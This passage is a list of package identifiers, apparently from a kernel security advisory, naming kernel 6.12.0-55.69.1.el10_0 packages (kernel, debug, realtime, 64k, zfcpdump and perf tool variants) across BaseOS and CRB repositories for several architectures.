"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
